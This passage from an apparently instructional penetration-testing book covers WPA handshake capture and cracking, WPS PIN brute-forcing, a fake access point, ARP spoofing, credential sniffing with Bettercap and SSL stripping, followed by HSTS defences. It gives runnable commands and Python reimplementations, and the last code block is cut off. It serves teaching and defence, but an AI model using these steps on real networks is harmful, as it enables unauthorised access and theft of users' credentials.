contain the password, encrypted or otherwise: it contains nonces and MICs
derived from the password, which is enough to test guesses offline. After
capturing it we use aircrack-ng to launch a wordlist attack against the
handshake to recover the AP key.
To crack a WPA network we need two things:
- A capture of the handshake
- A wordlist
Handshake capture procedure

1. Put the card into monitor mode

2. Start airodump-ng (the wireless card must be in monitor mode)
#airodump-ng wlan0mon

3. Capture packets from the specific AP and write them to a file (here the
prefix hs):
#airodump-ng --channel [channel] --bssid [AP MAC] --write hs wlan0mon

4. Force a handshake using a de-authentication attack.

5. Open a new terminal window and type the following command to force a
client to disconnect and reconnect, so the handshake is captured while
airodump-ng is still running and writing to the file:
#aireplay-ng --deauth 5 -a <AP MAC> -c <client MAC> wlan0mon

airodump-ng shows "WPA handshake: <AP MAC>" in the top right of its display
once it has captured one.

Stop the live capture and check the file with Wireshark to make sure the
capture contains the four EAPOL handshake packets (two consecutive messages,
1 and 2 or 2 and 3, are the minimum aircrack-ng can use, but a complete
handshake avoids a mismatched capture).
Open the file manager at /home and check the captured file named hs-01.cap.

Start Wireshark from the terminal (#wireshark) and open the hs-01.cap file.

In Wireshark, filter on "eapol", the handshake protocol.

After capturing the handshake we need a tool to guess the password using a wordlist. If the password is not in the wordlist, the handshake cannot be cracked and the wireless key stays unknown.
You can download ready-made wordlists from the internet, for example from the following resources:

ftp://ftp.openwall.com/pub/wordlists/
http://www.openwall.com/mirrors/
https://github.com/danielmiessler/SecLists
http://www.outpost9.com/files/WordLists.html
http://www.vulnerabilityassessment.co.uk/passwords.htm
http://packetstormsecurity.org/Crackers/wordlists/
http://www.ai.uga.edu/ftplib/natural-language/moby/
http://www.cotse.com/tools/wordlists1.htm
http://www.cotse.com/tools/wordlists2.htm
http://wordlist.sourceforge.net/
Or you can create your own wordlist using the "crunch" tool that comes as part of Kali:
#crunch [min] [max] [charset] -t [pattern] -o file
With -t the pattern fixes the characters you already know and uses placeholders for the unknown ones (@ lowercase letter, , uppercase letter, % digit, ^ symbol). For example, if you know the password starts with A, ends with U and is eight characters long, use -t A@@@@@@U with min and max both set to 8. Be aware that crunch output grows very quickly: the six lowercase placeholders in that pattern alone give 26^6 (about 309 million) lines.

Now we are going to use aircrack-ng to crack the key. For every password in the wordlist it computes the Pairwise Master Key (PMK) with PBKDF2-HMAC-SHA1, using the password as input and the AP name (ESSID) as salt, with 4096 iterations. From the PMK, the two MAC addresses and the two nonces in the handshake it derives the Pairwise Transient Key (PTK), recomputes the MIC of the captured EAPOL-Key message with the first 16 bytes of the PTK, and compares it with the MIC in the capture: a match means the password is the network key. aircrack-ng takes the capture file and the wordlist (-w) as input. The PBKDF2 step is deliberately slow, which is why a large wordlist takes a long time to test.
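What aircrack-ng computes for each wordlist entry, as an added example that is not part of the book and not aircrack-ng's own code: the PMK with PBKDF2, the PTK with the 802.11i PRF, and the EAPOL-Key MIC, compared against a handshake. The handshake here is constructed inline from a known passphrase (the SSID LabAP, the MAC addresses, the nonces and the wordlist are all made up for the example); only message 2 is built, because that is the message whose MIC is tested. The PMK function is checked against the IEEE 802.11i test vector (passphrase "password", SSID "IEEE").

```python
# Added example (not from the book, not aircrack-ng's code): the offline
# check aircrack-ng performs for every word of the wordlist.
import hashlib
import hmac

MIC_OFFSET = 81   # MIC field of an EAPOL-Key frame: 4-byte EAPOL header + 77 bytes of key fields


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..4, first 64 bytes."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(5))
    return out[:64]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs || min/max of the nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def build_eapol_m2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """EAPOL-Key message 2 (client -> AP) with an all-zero MIC field and empty key data."""
    body = bytes([2])                          # descriptor type 2 = RSN (WPA2)
    body += (0x010A).to_bytes(2, "big")        # key info: version 2 (HMAC-SHA1), pairwise, MIC present
    body += (16).to_bytes(2, "big")            # key length (CCMP)
    body += replay_counter.to_bytes(8, "big")
    body += snonce                             # 32-byte SNonce
    body += bytes(16) + bytes(8) + bytes(8)    # key IV, RSC, key ID (unused in message 2)
    body += bytes(16)                          # MIC placeholder
    body += (0).to_bytes(2, "big")             # key data length (RSN IE omitted in this example)
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL version 2, type 3 = Key


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2: MIC = first 16 bytes of HMAC-SHA1 over the frame with the MIC zeroed."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, m2_frame, wordlist):
    """Return the passphrase whose derived KCK reproduces the captured MIC, or None."""
    captured_mic = m2_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(word, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, m2_frame), captured_mic):
            return word
    return None


def make_handshake(passphrase, ssid, ap_mac, client_mac, anonce, snonce) -> bytes:
    """Constructed 'capture': the message 2 a real client would send for this passphrase."""
    frame = build_eapol_m2(snonce)
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def demo():
    ssid = "LabAP"                               # constructed values, not from any real capture
    ap_mac = bytes.fromhex("001122334455")
    client_mac = bytes.fromhex("66778899aabb")
    anonce = hashlib.sha256(b"anonce-example").digest()
    snonce = hashlib.sha256(b"snonce-example").digest()
    m2 = make_handshake("correct horse", ssid, ap_mac, client_mac, anonce, snonce)
    wordlist = ["password", "letmein", "Summer2021!", "correct horse", "qwerty123"]
    return crack_handshake(ssid, ap_mac, client_mac, anonce, snonce, m2, wordlist)


if __name__ == "__main__":
    print("recovered key:", demo())
```

The WPA (TKIP) key descriptor version 1 uses HMAC-MD5 for the MIC instead of HMAC-SHA1; everything else in the check is the same, which is why one capture format serves both.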

Summary steps for cracking WPA2:
- Put the wireless card in monitor mode.
- Find the access point that you need to crack and make sure that there are clients connected to the AP.
- Use airodump-ng to capture the AP packets and save the output to a file.
- Run a de-authentication attack against the AP to force a client to re-associate (use a different terminal to keep airodump-ng running).
- After the de-authentication finishes, stop airodump-ng.
- Make sure the handshake (EAPOL packets) was captured, using Wireshark to check the file.
- Create a wordlist with crunch or use a ready-made wordlist.
- Use aircrack-ng to crack the WPA password.

2.7. EAPOL protocol

The Extensible Authentication Protocol (EAP) is an authentication framework frequently used in wireless networks and point-to-point connections. It is defined in RFC 3748 and updated by RFC 5247.
EAP provides the transport and usage of keying material and parameters generated by EAP methods. There are many methods defined by RFCs, several vendor-specific methods, and new proposals. EAP is not a wire protocol; it only defines message formats, and each protocol that uses EAP defines a way to encapsulate EAP messages within its own messages.
EAPOL (EAP over LAN, IEEE 802.1X) is the encapsulation used on Ethernet and Wi-Fi. The WPA/WPA2 four-way handshake is carried in EAPOL-Key frames, which is why the Wireshark filter "eapol" isolates the handshake messages in the capture.
Note
Decrypting Wi-Fi frames will not show all the traffic as clear text, because some traffic is encrypted by the source application. HTTPS traffic, for example, is encrypted by the browser and then encrypted again by the Wi-Fi link layer; when the Wi-Fi frame is decrypted the result is still HTTPS-encrypted data.

2.8. Fake access point

By creating a free Wi-Fi access point, or a fake copy of an existing one, attackers can easily attract people to connect to their access point, especially in public places that have open Wi-Fi networks. When a victim connects to the fake access point he gets full access to the internet, but all of his traffic passes through the attacker's PC. The attacker can see all of the victim's unencrypted traffic, present the victim with a fake login page to steal credentials, and read any email the victim fetches over an unencrypted connection.
A fake access point can be created very easily using the Alfa card or any wireless card whose driver supports AP mode. There are many software tools that create the access point for us, such as wifipumpkin3.

Exercise 8: Creating a fake access point using wifipumpkin3

1. Download and install wifipumpkin3 from GitHub
#git clone https://github.com/P0cL4bs/wifipumpkin3.git
#apt install libssl-dev libffi-dev build-essential
#apt install python3-pyqt5
#cd wifipumpkin3
#python3 setup.py install
If the installation is successful you get the following message at the end:
"Finished processing dependencies for wifipumpkin3==1.0.0"
Before starting wifipumpkin3 make sure both network adapters are up: the Alfa card should be in managed mode and not connected to any Wi-Fi network (wifipumpkin3 turns it into the fake AP), and the other adapter provides the internet uplink.

2. Start wifipumpkin3
#wifipumpkin3 -i wlan0
wp3> help

3. See the available proxies and which one is running:
wp3> proxies

4. wp3> set proxy captiveflask

5. Check the fake access point settings: wp3> ap
Then type wp3> start

You should see a network called wifipumpkin3.

When a device connects to the network you will see its MAC address and then its traffic.

6. To change the access point name, stop wifipumpkin3 first:
wp3> stop
wp3> set ssid FREE_INTERNET
wp3> start

2.9. Securing Wireless Network

Now that we know how to test the security of all the common wireless encryption schemes (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks, because we know the weaknesses that attackers use.
- WEP: WEP is an old encryption scheme and it is really weak. As we have seen in this chapter, there are a number of methods that can be used to crack it regardless of the strength of the password, even when nobody is connected to the network. These attacks are possible because of the way WEP works (the RC4 keystream is reused with short, predictable IVs), and some of them recover the key in a few minutes.
- WPA/WPA2: WPA and WPA2 are similar. The main difference is the cipher used to encrypt the data (TKIP for WPA, AES-CCMP for WPA2), but both authenticate with the same four-way handshake. WPA/WPA2 can be attacked in two ways:

If the WPS feature is enabled there is a high chance of obtaining the key regardless of its complexity, by exploiting a weakness in WPS. WPS lets users connect to their wireless network without entering the key, either by pressing a WPS button on both the router and the device, or by entering an eight-digit PIN. The AP checks the PIN in two halves and the last digit is a checksum, so an attacker only has to try at most 10,000 + 1,000 values instead of 100 million, which a tool such as reaver does in a relatively short time (commonly quoted as 4 to 10 hours). Once the PIN is accepted, the AP hands the WPA/WPA2 passphrase to the client as part of the WPS exchange, so the attacker gets the actual key. This is not a weakness in WPA/WPA2 itself; it is a weakness in a feature that can be enabled on routers that use WPA/WPA2.
If WPS is not enabled, the practical way to crack WPA/WPA2-Personal is a dictionary attack: a list of passwords is tested against the captured handshake to check whether any of them is the actual network key. If the password is not in the wordlist, the attacker will not find it.
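Why the eight-digit WPS PIN is such a small keyspace, as an added example that is not part of the book and not reaver's code. The checksum rule is the one from the WPS specification; the access point is a constructed stand-in that confirms each half of the PIN separately, as the real M4/M6 exchange does, and the secret PIN 12345670 is the well-known default value. The attempt counts it reports are for this constructed AP only, not a measurement.

```python
# Added example (not from the book, not reaver's code): why the WPS PIN is
# a small keyspace. The checksum rule is from the WPS specification; the AP
# oracle and the secret PIN are constructed for the example.


def wps_checksum(first_seven: int) -> int:
    """Checksum digit for a 7-digit PIN prefix (WPS spec: weighted sum mod 10)."""
    accum = 0
    pin = first_seven
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True for an 8-digit PIN whose last digit is the correct checksum."""
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def keyspace() -> dict:
    """Worst-case number of guesses under three attacker models."""
    return {
        "all_8_digits": 10 ** 8,                 # what the PIN length suggests
        "checksum_known": 10 ** 7,               # last digit is derived, not chosen
        "halves_confirmed": 10 ** 4 + 10 ** 3,   # WPS confirms each half separately
    }


class ConstructedAP:
    """Stand-in for an access point: confirms each PIN half the way the WPS M4/M6 exchange does."""

    def __init__(self, pin: str):
        assert is_valid_wps_pin(pin)
        self._pin = pin
        self.m4_attempts = 0   # messages a real AP would see and could rate-limit or lock on
        self.m6_attempts = 0

    def first_half_ok(self, half: str) -> bool:    # AP answers M4 with M5 only if the first half matches
        self.m4_attempts += 1
        return half == self._pin[:4]

    def second_half_ok(self, half: str) -> bool:   # AP answers M6 with M7 only if the second half matches
        self.m6_attempts += 1
        return half == self._pin[4:]


def recover_pin(ap: ConstructedAP):
    """Reaver-style split search; returns (pin, total PIN attempts)."""
    first = next(f"{i:04d}" for i in range(10_000) if ap.first_half_ok(f"{i:04d}"))
    for j in range(1_000):
        second = f"{j:03d}"
        candidate = second + str(wps_checksum(int(first + second)))   # only checksum-valid PINs are tried
        if ap.second_half_ok(candidate):
            return first + candidate, ap.m4_attempts + ap.m6_attempts
    return None, ap.m4_attempts + ap.m6_attempts


def demo():
    """Attack a constructed AP whose PIN is the well-known default 12345670."""
    return recover_pin(ConstructedAP("12345670"))


if __name__ == "__main__":
    print(keyspace())
    print("recovered PIN, attempts:", demo())
```

The AP here never locks; a real one that locks WPS after a few failed M4/M6 exchanges is exactly the countermeasure that makes reaver stall, which is why the Lck column of wash matters.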

Conclusion:
- WEP is an old encryption method with major vulnerabilities and should not be used at all, as it can be cracked easily regardless of the complexity of the password and even when nobody is connected to the network.
- Use WPA2 (or WPA3 where your devices support it) with a long, complex passphrase that mixes small letters, capital letters, symbols and numbers and does not appear in any wordlist.
- Enterprises that have Active Directory and a wireless controller should integrate Wi-Fi access with Active Directory (WPA2-Enterprise with 802.1X/RADIUS), so that no shared Wi-Fi password is used.
- Disable the WPS feature on Wi-Fi routers, as it can be used to recover your complex WPA2 key by brute-forcing the easy WPS PIN.

3
Post Connection Attacks

After gaining access to the network through Wi-Fi, attackers move to the next stage of the attack, which is discovering the network and looking for vulnerabilities in systems, databases and applications. In this chapter you will learn tools to discover the network, such as Nmap, how to launch man in the middle attacks, and more.

3. Post Connection Attacks

After gaining access to the network we move on to discovering the network and which devices are connected to it. We have three tools for this: netdiscover, arp-scan and Nmap.
3.1. Network discovery
- A network discovery command tells us all the devices connected to the network, with the type (vendor, derived from the MAC address) and IP address of each device.

The wireless card should be in managed (client) mode and have an IP address from the network.
Exercise 9: Using the network discovery tool netdiscover
#netdiscover -i wlan0 -r 192.168.0.1/24

Exercise 10: Using the network discovery tool arp-scan

- If you are facing problems with netdiscover (with Kali 2020.2, netdiscover is not stable and sometimes does not show any devices in the scan), arp-scan does the same job and comes preinstalled in Kali.
- To use the arp-scan tool:
#arp-scan --help
#arp-scan -I wlan0 192.168.0.0/24
Repeat the above command more than once: ARP requests are unacknowledged broadcasts, and a busy or sleeping device may miss the first one.
Both tools only find hosts on the local subnet, because ARP does not cross routers.

3.2. Using the Nmap tool

- Nmap is a network discovery tool that can be used to gather detailed information about any host in the network. Nmap is a very large tool with many uses in penetration testing, and there are dedicated courses that teach Nmap.
- We shall have a look at some of Nmap's features to discover connected clients and gather more information about them.
- We are going to use Zenmap, the GUI front end of Nmap.
- Prior to Kali 2020.1, Zenmap came as part of the Kali distribution and there was no need to install it.
- Download Zenmap:
#cd Downloads
#wget https://nmap.org/dist/zenmap-7.80-1.noarch.rpm

- Convert the .rpm file to a .deb file using alien:
#apt-get update
#apt install alien
#alien zenmap-7.80-1.noarch.rpm

- Install using dpkg (lowercase -i installs; a capital -I only prints package information):
#dpkg -i zenmap_7.80_all.deb

Zenmap 7.80 still depends on Python 2 and PyGTK, so on a recent Kali the package may not start until those are installed; later Nmap releases ship a Zenmap ported to Python 3. Everything Zenmap does is also available from the nmap command line, and Zenmap shows the equivalent command for each profile.

- Start Zenmap:
#zenmap

Exercise 11: Using Nmap

- In Kali type the following command to start the Nmap GUI:
#zenmap
- In the Target field enter an IP address or a subnet (for example the lab network 10.0.2.0/24) and run the default scan.

Note
The above exercise is meant to make you familiar with Nmap. Nmap is the main tool that vulnerability assessment tools and attackers start with to discover open ports on servers. An open port means a listening service, and a service with a known vulnerability or a weak configuration is what leads to server compromise. We are going to use Nmap in other penetration tests throughout this book.

3.3. Man in the Middle Attacks (MiTM)

A man in the middle attack is one in which the attacker secretly intercepts and relays messages between two parties who believe they are communicating directly with each other. MiTM attackers pose a serious threat to online security because the attacker can capture and manipulate sensitive information in real time. The attack is a type of eavesdropping (eavesdropping is the unauthorized real-time interception of a private communication, such as a phone call, instant message, video conference or fax transmission; the term derives from the practice of standing under the eaves of a house listening to the conversations inside) in which the entire conversation is controlled by the attacker. A MiTM attack has a strong chance of success when the attacker can impersonate each party to the satisfaction of the other; when it is used to take over an authenticated session it is also called session hijacking.
A common method of executing a MiTM attack involves distributing malware that gives the attacker access to the user's web browser and the data it sends and receives during transactions and conversations. Once the attacker has control, he can redirect users to a fake site that looks like the site the user expects to reach. The attacker then creates a connection to the real site and acts as a proxy to read, insert and modify the traffic between the user and the legitimate site. Online banking and e-commerce sites are frequent targets of MiTM attacks, so that the attacker can capture login credentials and other sensitive data.
Most cryptographic protocols include some form of endpoint authentication specifically to prevent MiTM attacks. For example, TLS authenticates one or both parties using certificates issued by a mutually trusted certificate authority. Unless users heed the warning when a suspect certificate is presented, however, a MiTM attack can still be carried out with a fake or forged certificate.
A MiTM attacker can also exploit weaknesses in a wireless router's security caused by weak or default passwords, or set up a malicious router, also called an evil twin or fake access point, in a public place like a café or hotel to intercept the information travelling through it.
Types of MiTM attacks:
- ARP spoofing
- DNS spoofing
- STP mangling
- DHCP spoofing
- ICMP redirection
- and more

3.4. ARP Spoofing

The Address Resolution Protocol (ARP) is essential for communication on a LAN: it maps an IP address (for example the router's) to the MAC address that frames must be sent to. The protocol has no authentication, so a client accepts any ARP reply that says "I am the router" and starts sending its packets to that MAC address. This weakness is what ARP spoofing exploits. ARP spoofing is hard to prevent on a flat network once the attacker is on it, for example with the Wi-Fi password; the mitigations are covered in section 3.10.

ARP protocol main security issues:
- Each ARP request/response is trusted without verification.
- A client accepts a reply even if it did not send a request (a gratuitous reply), and overwrites its cache entry with it.
ARP Spoofing
We are going to do a MiTM attack using ARP spoofing by telling the client that we are the router and, at the same time, telling the router that we are the client.

Exercise 12: ARP spoofing using the arpspoof tool

- In this exercise we are going to use the virtual environment that we created in VirtualBox: we spoof the Windows machine from Kali Linux so that it sends all its packets to the Kali machine.
- Go to VirtualBox and make sure that both the Kali Linux and Windows machines are attached to the same NAT network (the lab uses 10.0.2.0/24, with 10.0.2.1 as the router).
- Start both the Kali and Windows virtual machines.
- In this exercise we run arpspoof to tell the Windows machine that Kali is the router, and in the other direction to tell the router that Kali is the Windows machine.
- Then we can use Wireshark in Kali to see the traffic between the Windows machine and the router, because the traffic is going through the Kali machine.
- On the Windows machine run the following command (to see the ARP table and note the router's real MAC address):
arp -a

- In Kali install the arpspoof tool (part of the dsniff package):
#apt install dsniff

- In Kali, enable IP forwarding first, so that the Windows machine keeps its connectivity while it is being spoofed (without this its traffic is dropped by Kali and the victim notices the outage):
#echo 1 > /proc/sys/net/ipv4/ip_forward

- In Kali open a terminal window and type:
#arpspoof -i eth0 -t 10.0.2.6 -r 10.0.2.1
-i = the interface in Kali Linux that we are going to use for the MiTM attack
-t = target machine IP address
-r = router IP address (with -r, arpspoof poisons both hosts, so the Windows machine thinks Kali is the router and the router thinks Kali is the Windows machine)

- Go to the Windows machine and run arp -a again: the router's IP address now shows Kali's MAC address.

- Do not close the arpspoof terminal; the forged replies have to be repeated continuously or the ARP caches recover.

- To monitor the traffic, start Wireshark in Kali and start capturing on eth0.

- On the Windows 10 machine go to an http site.

- In Kali check Wireshark and filter for http.

3.5. MiTM with the Bettercap tool

Bettercap is a powerful, flexible and portable tool created to perform various types of MiTM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in real time, sniff for credentials and much more.
There is a lot of material online, especially on the official Bettercap website, documenting how the tool is used and the improvements made to it over the years.
Bettercap website: www.bettercap.org

Exercise 13: Installing the Bettercap tool

1. Start a Kali terminal and update Kali Linux:
#apt-get update
#apt-get install bettercap

2. Start Bettercap by typing:
#bettercap -iface eth0 (eth0 is the Kali interface that we are going to use for Bettercap)

3. Type help to see the commands that can be used, the modules inside Bettercap and the status of each module (running or not).

4. To see how to use a module, type help followed by the module name.

5. For example, to see how to use the net.recon module:
>help net.recon

6. Turn on the net.recon module, then start the Windows machine; you will see that the module discovers the Windows machine:
>net.recon on

7. The net.probe module sends probe packets to the whole subnet that Bettercap resides on, and net.recon records the responses from clients in a table. Enabling net.probe automatically starts net.recon:
>net.probe on
8. Type help again to see which modules are now running.

9. Type net.show to list the discovered hosts with their IP address, MAC address and vendor.

Exercise 14: ARP spoofing with Bettercap

1. Start Bettercap:
#bettercap -iface eth0
2. Read the help of the arp.spoof module:
>help arp.spoof

3. Set the arp.spoof module to full duplex, so that both the victim machine and the router are poisoned:
>set arp.spoof.fullduplex true

4. Set the target victim machine to be ARP spoofed (the Windows machine):
>set arp.spoof.targets 10.0.2.6

Note
You can change any module parameter in Bettercap the same way: type set followed by the parameter name as shown in the module's help, then the value.
You can use tab to autocomplete the parameter name.
5. Turn the module on:
>arp.spoof on

6. Go to the Windows machine and type arp -a: the router entry now shows the Kali MAC address.

7. To see the traffic of the Windows machine you need to start another Bettercap module, net.sniff:
>net.sniff on

8. Stop the arp.spoof module when done; Bettercap sends the correct addresses again when the module is turned off, so the victims' ARP caches recover:
>arp.spoof off

Exercise 15: Intercepting HTTP traffic with Bettercap

HTTP traffic is not encrypted, so when a man in the middle attack is running against a target computer and the target logs in to a site over http, all of its traffic, including the username and password, is visible to the attacker running the MiTM attack. In the following exercise we use Bettercap to intercept traffic from the virtual Windows machine; when the Windows user logs in to an http website we see the credentials because they are not encrypted.
1. Start Kali and set up Bettercap as in Exercise 14 (arp.spoof in full duplex against the Windows machine, then net.sniff on).

2. On the Windows machine open a web browser and go to the following website:
http://testing-ground.scraping.pro/login
Log in as admin with password 12345.

3. Look at the Bettercap output in Kali: net.sniff prints the POST request with the submitted form fields.

Exercise 16: Automating Bettercap attacks using caplets

Bettercap has a feature called "caplets". A caplet automates any job we need to do in Bettercap: type the series of commands required for the job in a text editor and save the file with a .cap extension. In the following exercise we create a .cap file for the previous ARP spoofing exercise and call it when we start Bettercap.

1. Open the mousepad text editor in Kali.

2. Inside mousepad type all the commands entered in the previous exercise, in order, to start ARP spoofing and sniff the result (one command per line, exactly as typed at the Bettercap prompt).

3. Save the file as arpSpoof.cap in the /root directory.

4. Make sure that you exit the previous Bettercap session by typing exit.
5. Type #bettercap -iface eth0 -caplet arpSpoof.cap

6. To make sure that arp.spoof runs with all required modules enabled, type >help

7. To see all the caplets that come with Bettercap:
#cd /usr/share/bettercap/caplets

8. Move the arpSpoof caplet that we created to /usr/share/bettercap/caplets, so that Bettercap can run it by name from its prompt (as done in the later exercises).

9. Modify the arpSpoof caplet to have more sniffing capabilities by adding the option to sniff local traffic:
#mousepad arpSpoof.cap
Inside the file add the following line:
set net.sniff.local true

10. Save the file.

11. To list all the caplets that come as part of Bettercap:
Start Bettercap
#bettercap -iface eth0
>caplets.show
Bypassing https
The bypass-https attack, better known as SSL stripping, is a man in the middle attack in which a website secured with HTTPS is downgraded to HTTP. All traffic from the victim machine is routed through a proxy run by the attacker, which talks HTTPS to the real site but serves the victim plain HTTP with every https:// link rewritten to http://. The technique (sslstrip, presented by Moxie Marlinspike in 2009) rests on a simple observation: most users do not reach HTTPS sites by typing or bookmarking https://abc.com. They connect to the non-SSL address and get redirected (HTTP 302), or they follow a link from an http page to the https site; the attacker simply holds on to that first http connection and never lets the redirect or the https link reach the browser. An HSTS header is not a redirect: it tells the browser to use only HTTPS for that site from then on.
HSTS
HSTS (HTTP Strict Transport Security) is a web security mechanism that protects against downgrade attacks, MiTM attacks and session hijacking. It does this by forcing web browsers to communicate over HTTPS and rejecting attempts to use insecure HTTP. Originally drafted in 2009 by a group of PayPal employees, HSTS was published in 2012 and is recognized by the IETF as an Internet standard, specified in RFC 6797.
Why HSTS?
A man in the middle attack works very well on public Wi-Fi, or on any Wi-Fi that the attacker has access to. It is very easy for someone with the knowledge and tools to launch a MiTM attack and see a victim's traffic if it is not encrypted. Normally HTTPS encrypts the traffic from the victim's web browser to the website, but a MiTM attacker also has a way to get around HTTPS: SSL stripping, which forces the web browser to use HTTP instead of HTTPS. This is where the HSTS header comes in. The website sends a header that tells the browser to use only HTTPS to communicate with it; the browser stores this information and the next time the user connects, even if he types http, the browser automatically changes it to https before any request is sent. The connection therefore cannot be downgraded to HTTP and SSL stripping does not work.

SSL stripping technique through a MiTM attack

How does HSTS work?
If you want to enable HSTS on your website, you must add an HTTP response header on the server, sent with every HTTPS response.
Here is the header you should add:
Strict-Transport-Security: max-age=expireTime; includeSubDomains; preload
As far as the header is concerned, max-age is mandatory. It is the time, in seconds, for which the browser must enforce HSTS for your site.
Apart from max-age, you can add the includeSubDomains and preload flags. includeSubDomains extends the HSTS protection to the entire website including its subdomains; it is not required, but it is highly recommended, because an attacker could otherwise strip a subdomain that shares cookies with the main site. The preload flag at the end tells browsers that the website is being submitted to the HSTS preload list. Include preload only if you have preloaded (or are submitting) your domain; otherwise leave it out.
Once you add the header to your web server, it ensures that connections are made only via HTTPS. However, this has its own pitfall. Web browsers obey the HSTS header only when it is received over HTTPS: a Strict-Transport-Security header seen on a plain HTTP response is ignored, so if the very first visit is made over HTTP, nothing is stored and that visit is not protected.
To see the HSTS list in Chrome, type the following in the address bar:
chrome://net-internals/#hsts

Dynamic
A site reported in dynamic mode (dynamic_sts_domain in the query result) is one for which the browser has been instructed to enable HSTS by an HTTP response header, served over TLS, like the following:
Strict-Transport-Security: max-age=157680000; includeSubDomains
This is vulnerable to an attack in which, the very first time the browser requests the domain with http:// (not https://), an adversary intercepts the communication, before the browser has ever seen the header.

Static
A site such as facebook.com is reported as static_sts: this overcomes the weakness of the dynamic mode. The static mode hard-codes HSTS records directly into the browser's source. The header is changed to indicate the administrator's intention:
Strict-Transport-Security: max-age=157680000; includeSubDomains; preload
Note
the inclusion of preload at the end. The domain is then submitted for review at hstspreload.org. If approved, it is added to the Chromium list and is also included in the Firefox, Safari, IE 11 and Edge lists.
SSL stripping attack conditions:

1. SSL stripping works only on connections that start over plain http.

2. With dynamic HSTS the user connects to the website via http once, is redirected to https and the browser stores the HSTS entry; from then on the browser changes the link to https by itself and the SSL strip attack fails. Only the very first visit is exposed.
3. With static (preloaded) HSTS the web browser uses only https from the start, so the SSL stripping attack fails even on the first visit.
4. Some sites have no http version of the website and no redirection, so the user sees a connection failure if he tries http; there is nothing for the attacker to strip.
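The browser-side half of what the header and the four conditions above describe, as an added example that is not part of the book and not any browser's code: a minimal HSTS store in the sense of RFC 6797 that records the header only when it arrives over HTTPS, honours max-age, includeSubDomains and max-age=0, and rewrites an http:// navigation before any request leaves. The hosts, headers, clock and the one preload entry are constructed for the example; the preload set is assumed to cover subdomains, as the real list requires.

```python
# Added example (not from the book): a minimal model of the browser-side
# HSTS store (RFC 6797) showing when an http:// navigation is upgraded and
# therefore when sslstrip fails. Hosts, headers, clock and the preload entry
# are constructed for the example.
import time
from urllib.parse import urlsplit, urlunsplit


def parse_sts_header(value: str):
    """Parse Strict-Transport-Security; return (max_age, include_subdomains, preload) or None if invalid."""
    max_age, include_sub, preload = None, False, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name, val = name.strip().lower(), val.strip().strip('"')
        if name == "max-age":
            if not val.isdigit():
                return None                   # malformed max-age invalidates the whole header
            max_age = int(val)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    return None if max_age is None else (max_age, include_sub, preload)


class HstsStore:
    """Dynamic entries learnt from headers plus a constructed static (preload) list."""

    def __init__(self, preload=(), now=time.time):
        self.now = now
        self.dynamic = {}                               # host -> (expiry timestamp, include_subdomains)
        self.static = {h.lower() for h in preload}      # assumed to cover subdomains, as preload requires

    def observe_response(self, url: str, headers: dict) -> bool:
        """Record the policy; a header received over plain http is ignored, exactly like a browser."""
        parts = urlsplit(url)
        value = headers.get("Strict-Transport-Security")
        if parts.scheme != "https" or value is None:
            return False
        parsed = parse_sts_header(value)
        if parsed is None:
            return False
        max_age, include_sub, _ = parsed
        host = parts.hostname.lower()
        if max_age == 0:
            self.dynamic.pop(host, None)                # max-age=0 tells the browser to forget the host
        else:
            self.dynamic[host] = (self.now() + max_age, include_sub)
        return True

    def is_known(self, host: str) -> bool:
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])            # exact host first, then each parent domain
            if candidate in self.static:
                return True
            entry = self.dynamic.get(candidate)
            if entry and entry[0] > self.now() and (i == 0 or entry[1]):
                return True
        return False

    def navigate(self, url: str) -> str:
        """The URL the browser really requests: http:// becomes https:// for known hosts before any packet is sent."""
        parts = urlsplit(url)
        if parts.scheme == "http" and self.is_known(parts.hostname):
            return urlunsplit(("https",) + tuple(parts[1:]))
        return url


def sslstrip_scenarios() -> dict:
    """The first-visit situations from the text, with a fixed clock so the result is deterministic."""
    clock = [1_000_000]
    store = HstsStore(preload=["facebook.com"], now=lambda: clock[0])
    out = {}
    # 1. Header arrives over plain http (what a stripped first visit looks like): ignored, strip keeps working.
    store.observe_response("http://shop.example/", {"Strict-Transport-Security": "max-age=31536000"})
    out["http_first_visit"] = store.navigate("http://shop.example/login")
    # 2. After one genuine https visit the browser rewrites http:// itself; the attacker never sees a strippable request.
    store.observe_response("https://shop.example/",
                           {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"})
    out["after_https_visit"] = store.navigate("http://shop.example/login")
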